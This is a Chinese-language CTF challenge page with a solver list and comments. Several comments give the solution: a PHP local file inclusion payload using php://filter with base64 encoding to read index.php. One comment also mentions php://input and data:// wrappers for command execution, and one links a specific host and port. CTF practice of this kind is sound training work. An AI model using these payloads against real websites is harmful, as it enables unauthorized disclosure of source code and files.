评分(11)
解题动态
St@r 攻破了该题 1天前
1481998181 攻破了该题 2天前
dyh1213 攻破了该题 2天前
ethicalpaws 攻破了该题 4天前
是小白鸭 攻破了该题 4天前
noooo 攻破了该题 4天前
Flynnn 攻破了该题 4天前
18103861563 攻破了该题 5天前
llaa 攻破了该题 5天前
w111 攻破了该题 6天前
SUPER_LEON 攻破了该题 6天前
yxrw 攻破了该题 7天前
yueqian 攻破了该题 8天前
Posin 攻破了该题 9天前
xqy520 攻破了该题 9天前
DamonLee 攻破了该题 9天前
regvfds 攻破了该题 9天前
lucabalza 攻破了该题 9天前
yxrqq817423 攻破了该题 10天前
评论
Ywctf 2月前
举报
/?file=php://filter/read=convert.base64-encode/resource=index.php
帅帅123 3月前
举报
发现参数?file= 怀疑是文件读取或者目录穿越 尝试php为协议 命令执行:php://input data://text/plain,<?php ?> 字节流编码读取: php://filter/conver.base64-encode/resource=index.php
奔跑的开开 3月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php
ok了 5月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php 秒了
VVang 6月前
举报
用php://filter包含index.php,然后base64解码得到flag
聪10011 6月前
举报
猜flag位置,file=/flag
8208240204 7月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php 然后发现==表明是base64解码得到flag
2686213396 7月前
举报
http://117.72.52.127:17540/index.php?file=php://filter/convert.base64-encode/resource=index.php,php伪协议,读取 index.php文件
zhuizhui 8月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php
17734916426 10月前
举报
index.php?file=/flag